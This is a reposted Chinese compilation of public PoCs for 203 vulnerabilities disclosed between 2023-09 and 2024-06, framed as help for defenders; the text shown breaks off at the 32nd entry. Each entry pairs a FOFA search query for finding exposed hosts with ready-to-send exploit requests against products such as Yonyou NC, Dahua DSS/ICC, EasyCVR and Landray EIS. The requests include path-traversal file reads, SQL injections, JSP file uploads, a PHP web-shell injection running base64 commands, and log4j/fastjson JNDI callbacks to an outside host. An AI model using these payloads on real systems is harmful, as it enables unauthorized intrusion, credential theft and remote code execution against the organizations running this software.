Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29
道一安全 2024-06-05 07:41 Beijing
The following article comes from 网络安全新视界, author 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of attacks seen in offensive/defensive security exercises, and we hope this article is of some help to defenders. Defensive teams can use its contents to check their own exposure.

Sources: The article covers 203 PoCs for high-severity vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were collected and published by the 网络安全新视界 team.

Patches: All of the vulnerabilities are publicly known; please contact the product vendor for patches or remediation guidance.

Content: Because of length limits, a few PoCs that are too long have been replaced uniformly with the word PAYLOAD; search for the full PoC yourself if you need it.

Rights: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.

Statement:

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version; when using it, press F12 and search for a keyword.

Bookmark this article if you find it useful. You can also follow this public account (网络安全新视界).

01 Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information leak
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password leak
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication (PACS) system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. Founder full-media news editing system binary SQL injection
202. 微擎 (WeEngine) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

02 PoC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information leak
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the admin backend with the default admin account, perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword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
Host: x.x.x.x

The payload is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the injected function executes a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

